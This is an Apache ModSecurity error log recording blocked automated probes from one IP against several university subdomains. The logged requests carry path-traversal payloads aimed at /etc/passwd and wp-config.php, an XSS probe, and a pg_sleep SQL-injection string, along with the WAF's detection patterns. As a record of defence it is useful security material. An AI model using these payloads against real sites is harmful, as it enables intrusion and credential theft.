[Tue Aug 29 11:36:45.439968 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113cCo-f0AAAWkfU0AAAAQ"]
[Tue Aug 29 11:36:45.443916 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113cCo-f0AAAWuqzIAAAAZ"]
[Tue Aug 29 11:36:46.389116 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113sCo-f0AAAWkfU8AAAAQ"]
[Tue Aug 29 11:36:47.462904 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1138Co-f0AAAW1WboAAAAD"]
[Tue Aug 29 11:36:49.397595 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWnjkwAAAAT"]
[Tue Aug 29 11:36:49.416621 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWkfWAAAAAQ"]
[Tue Aug 29 11:36:49.419114 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAW1WcYAAAAD"]
[Tue Aug 29 11:36:49.435117 2023] [:error] [pid 1456] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWwdRQAAAAe"]
[Tue Aug 29 11:36:49.511854 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAN5YNwAAAAN"]
[Tue Aug 29 11:36:56.366833 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAVsUiEAAAAb"]
[Tue Aug 29 11:36:56.519531 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAV9b3MAAAAA"]
[Tue Aug 29 11:36:56.521519 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAUbg-kAAABQ"]
[Tue Aug 29 11:36:56.552387 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAWx820AAAAg"]
[Tue Aug 29 11:36:56.574180 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAVsUicAAAAb"]
[Tue Aug 29 11:36:57.427400 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWlCf8AAAAR"]
[Tue Aug 29 11:36:57.494452 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWlCgIAAAAR"]
[Tue Aug 29 11:36:57.551878 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWx83cAAAAg"]
[Tue Aug 29 11:36:57.554443 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWlCgQAAAAR"]
[Tue Aug 29 11:36:57.571556 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAV9b4AAAAAA"]
[Tue Aug 29 11:36:58.474950 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO116sCo-f0AAAUbhAoAAABQ"]
[Tue Aug 29 11:37:05.410911 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO118cCo-f0AAATfd8MAAAAk"]
[Tue Aug 29 11:37:06.778681 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO118sCo-f0AAAQSWbcAAAA0"]
[Tue Aug 29 11:37:07.631888 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW9IQ0AAAAI"]
[Tue Aug 29 11:37:07.641175 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAUbhGUAAABQ"]
[Tue Aug 29 11:37:07.708155 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW9IRAAAAAI"]
[Tue Aug 29 11:37:07.709579 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW7FKUAAAAE"]
[Tue Aug 29 11:37:07.939980 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAWdsooAAAAM"]
[Tue Aug 29 11:37:09.410776 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAUFdmkAAAA9"]
[Tue Aug 29 11:37:09.436019 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAUFdmoAAAA9"]
[Tue Aug 29 11:37:09.450622 2023] [:error] [pid 1468] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW85hUAAAAH"]
[Tue Aug 29 11:37:09.509677 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAUbhHYAAABQ"]
[Tue Aug 29 11:37:09.528388 2023] [:error] [pid 1468] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW85hcAAAAH"]
[Tue Aug 29 11:37:15.381029 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11@8Co-f0AAAXA9WMAAAAO"]
[Tue Aug 29 11:37:16.450656 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAWdstcAAAAM"]
[Tue Aug 29 11:37:16.461710 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAUbhKoAAABQ"]
[Tue Aug 29 11:37:16.500727 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAWdstkAAAAM"]
[Tue Aug 29 11:37:16.517277 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAXA9W0AAAAO"]
